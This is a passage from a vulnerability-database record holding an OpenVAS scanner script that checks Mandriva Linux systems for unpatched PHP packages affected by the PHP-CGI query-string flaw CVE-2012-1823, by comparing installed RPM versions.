exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-06T13:07:18", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-01-05T00:00:00", "published": "2012-08-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831624", "id": "OPENVAS:831624", "title": "Mandriva Update for php MDVSA-2012:068 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDVSA-2012:068 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in php(-cgi):\n\n PHP-CGI-based setups contain a vulnerability when parsing query string\n parameters from php files. A remote unauthenticated attacker could\n obtain sensitive information, cause a denial of service condition or\n may be able to execute arbitrary code with the privileges of the web\n server (CVE-2012-1823).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"php on Mandriva Linux 2011.0,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:068\");\n script_id(831624);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:55:23 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:068\");\n script_name(\"Mandriva Update for php MDVSA-2012:068 (php)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-doc\", rpm:\"php-doc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqlnd\", rpm:\"php-mysqlnd~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-phar\", rpm:\"php-phar~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite3\", rpm:\"php-sqlite3~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sybase_ct\", rpm:\"php-sybase_ct~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-doc\", rpm:\"php-doc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqlnd\", rpm:\"php-mysqlnd~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-phar\", rpm:\"php-phar~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite3\", rpm:\"php-sqlite3~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sybase_ct\", rpm:\"php-sybase_ct~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 